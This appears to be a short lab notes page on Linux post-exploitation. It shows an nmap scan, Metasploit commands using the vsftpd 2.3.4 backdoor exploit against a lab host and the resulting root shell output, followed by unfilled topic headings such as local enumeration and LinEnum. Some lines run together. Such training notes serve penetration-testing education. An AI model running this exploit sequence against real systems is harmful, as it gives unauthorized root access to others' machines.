🔬Linux Post-Exploitation
Enumeration & Exploitation
nmap -sV 192.218.227.3
21/tcp open ftp vsftpd 2.3.4searchsploit vsftpd 2.3.4
service postgresql start && msfconsole -qsearch vsftpd
use exploit/unix/ftp/vsftpd_234_backdoor
setg RHOSTS 192.218.227.3
setg RHOST 192.218.227.3
run
[+] 192.218.227.3:21 - UID: uid=0(root) gid=0(root) groups=0(root)
[*] Found shell.
/bin/bash -i
root@victim-1:~/vsftpd-2.3.4#Local Enumeration
System Information
Users & Groups
Network Information
Processes & Cron Jobs

Automating Local Enum
Enumeration & Exploitation

Metasploit Post-Exploitation




LinEnum

Last updated